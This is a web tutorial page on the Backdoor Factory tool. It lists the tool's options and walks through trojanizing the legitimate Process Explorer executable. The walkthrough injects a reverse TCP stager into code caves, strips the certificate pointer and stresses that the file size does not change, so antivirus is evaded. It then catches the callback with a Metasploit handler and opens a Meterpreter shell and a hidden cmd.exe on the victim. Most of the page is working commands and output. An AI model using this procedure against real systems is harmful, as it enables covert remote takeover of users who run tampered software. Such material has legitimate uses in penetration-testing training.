Backdoor-Factory

Description

The goal of   Backdoor-Factory  BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

“Backdoor Factory” (BDF for short) that patches malicious payloads into binaries in a way that makes it trivial to bypass Anti-Virus, retains full binary functionality, and does not increase the file size by a single byte.

How is BDF different from other tools such as MSFVenom? Tools like MSFVenom have the ability to patch a malicious code into legitimate binaries by appending the malicious code to the end. The problem with this is that it not only increases file size of the backdoored binary but it is also easier for Antivirus engines to pick up on this. BDF makes it much easier for attackers to hide malware in binaries by utilizing code caves.

Code caves are products of code compilers. There are certain times where a code compiler will have to pad certain areas of the binary and it does so by padding with a whole series of 0x00 bytes. Those are known as code caves and BDF overwrites those code caves with malicious code. Because you are utilizing null space already present in a binary, you will not see a change in file size when using BDF.

Usage

Syntax

backdoor.py7 [options]

Options

   -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file Backdoor Factory
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner. Backdoor Factory
  -v, --verbose         For debug information output. Backdoor Factory
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.
  -B BEACON, --beacon=BEACON
                        For payloads that have the ability to beacon out, set
                        the time in secs
  -m PATCH_METHOD, --patch-method=PATCH_METHOD
                        Patching methods for PE files, 'manual','automatic',
                        and onionduke
  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
                        For onionduke. Provide your desired binary.
  -X, --xp_mode         Default: DO NOT support for XP legacy machines, use -X
                        to support XP. By default the binary will crash on XP
                        machines (e.g. sandboxes)

Example

Exploiting Process Explorer as Backdoor 

Download Process Explorer : 

cyborg@cyborg:~/Downloads/ProcessExplorer$ ls -l
total 2528
-rw-r--r-- 1 cyborg cyborg    2028 Jun 28  2014 Eula.txt
-rw-r--r-- 1 cyborg cyborg   72154 Oct 15  2012 procexp.chm
-rwxr-xr-x 1 cyborg cyborg 2508440 Mar  9  2015 procexp.exe

Check the md5sum of procexp.exe , it is worth to mention that backdoored will be of exact size as this procexp.exe (2508440) , However md5sum is to confirm that file does get backdoored.

cyborg@cyborg:~/Downloads/ProcessExplorer$ md5sum procexp.exe 

d1bfe40fbca45df028029e2b5f2a62e4 procexp.exe

Copy procexp.exe to Backdoor Factory Directory :

cyborg@cyborg:~/Downloads/ProcessExplorer$ cd
cyborg@cyborg:~$ sudo cp Downloads/ProcessExplorer/procexp.exe /pentest/exploits/the-backdoor-factory-master
cyborg@cyborg:~$ cd /pentest/exploits/the-backdoor-factory-master
cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ ls 
aPLib        COPYING      install.sh    onionduke        procexp.exe
arm          elfbin.py    intel         payloadtests.py  README.md
asm          elfbin.pyc   machobin.py   pebin.py         update.sh
backdoor.py  __init__.py  machobin.pyc  pebin.pyc        winapi

Check the payload available for this exe file :

 

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ sudo python backdoor.py  -f procexp.exe -s show
[sudo] password for cyborg: 
    ____  ____  ______           __      
   / __ )/ __ \/ ____/___ ______/ /_____  _______  __
  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /
 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /
/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /
                                            /____/

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.1.3 Backdoor Factory
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
   cave_miner_inline
   iat_reverse_tcp_inline
   iat_reverse_tcp_inline_threaded
   iat_reverse_tcp_stager_threaded
   iat_user_supplied_shellcode_threaded
   meterpreter_reverse_https_threaded
   reverse_shell_tcp_inline
   reverse_tcp_stager_threaded
   user_supplied_shellcode_threaded

We will use iat_reverse_stager_threaded payload for this exploit :

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ sudo python backdoor.py  -f procexp.exe -s iat_reverse_tcp_stager_threaded -P 4444 -H  192.168.1.8
    ____  ____  ______           __      
   / __ )/ __ \/ ____/___ ______/ /_____  _______  __
  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /
 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /
/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /
                                            /____/

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.1.3 Backdoor Factory
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 453
[*] All caves lengths:  453
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 453
[*] Available caves: 
1. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xd7d2b End: 0xd7fcc; Cave Size: 673
2. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda269 End: 0xda444; Cave Size: 475
3. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda497 End: 0xda688; Cave Size: 497
4. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda6ef End: 0xda8cc; Cave Size: 477
5. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xdadc1 End: 0xdaf98; Cave Size: 471
6. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xdb32d End: 0xdb55c; Cave Size: 559
7. Section Name: None; Section Begin: None End: None; Cave begin: 0xdcc0b End: 0xdce04; Cave Size: 505
8. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1ecde5 End: 0x1ed168; Cave Size: 899
9. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1efc5d End: 0x1efe38; Cave Size: 475
10. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1efe8f End: 0x1f0080; Cave Size: 497
11. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f00eb End: 0x1f02c8; Cave Size: 477
12. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f07c9 End: 0x1f09a0; Cave Size: 471
13. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f0d6d End: 0x1f10a8; Cave Size: 827
14. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20165f End: 0x20183c; Cave Size: 477
15. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20205a End: 0x20224a; Cave Size: 496
16. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20265c End: 0x20283c; Cave Size: 480
17. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2060d7 End: 0x2062ab; Cave Size: 468
18. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20b1c4 End: 0x20b45c; Cave Size: 664
19. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20d5e3 End: 0x20d85c; Cave Size: 633
20. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20dfa3 End: 0x20e180; Cave Size: 477
21. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20e47b End: 0x20e7cc; Cave Size: 849
22. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20e923 End: 0x20ef53; Cave Size: 1584
23. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2105bc End: 0x210d34; Cave Size: 1912
24. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x210ecb End: 0x2110ef; Cave Size: 548
25. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x211be4 End: 0x211edc; Cave Size: 760
26. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2126ac End: 0x212884; Cave Size: 472
27. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x230c3b End: 0x230e0f; Cave Size: 468
28. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x235d28 End: 0x235fc0; Cave Size: 664
29. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238147 End: 0x2383c0; Cave Size: 633
30. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238b07 End: 0x238ce4; Cave Size: 477
31. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238fdf End: 0x239330; Cave Size: 849
32. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x239487 End: 0x239ab7; Cave Size: 1584
33. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23b120 End: 0x23b898; Cave Size: 1912
34. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23ba2f End: 0x23bc53; Cave Size: 548
35. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23c748 End: 0x23ca40; Cave Size: 760
36. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23d210 End: 0x23d3e8; Cave Size: 472
**************************************************
[!] Enter your selection: 5
[!] Using selection: 5
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
[*] Overwriting certificate table pointer
File procexp.exe is in the 'backdoored' directory

set host (-H) and port (-P) according your host and prefered port. also file is now backdoored inside “backdoored” folder 

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ ls
aPLib       backdoor.py  __init__.py  machobin.pyc     pebin.pyc    winapi
arm         COPYING      install.sh   onionduke        procexp.exe
asm         elfbin.py    intel        payloadtests.py  README.md
backdoored  elfbin.pyc   machobin.py  pebin.py         update.sh
cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ cd backdoored/

check the file and its size :

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ ls -l
total 2452
-rwxrwxrwx 1 root root 2508440 Oct 12 12:36 procexp.exe

The size is exactly the same as of non-backdoored file . Now we will check the mdsum of it:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ md5sum procexp.exe 
fbf9d5a97ce36f965f0dde157bbc7282  procexp.exe

Md5sum is different from the original one, means file is backdoored, now start metasploit for reverse connection :

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ cd
cyborg@cyborg:~$ sudo msfpro
[*] Starting Metasploit Console...

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Successfully loaded plugin: pro


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.8
LHOST => 192.168.1.8
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.8:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.40:51775) at 2015-10-12 12:57:58 +0530


meterpreter > pwd
C:\Users\ztrela\Downloads
meterpreter > execute -f cmd.exe -i -H
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ztrela\Downloads>

 

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?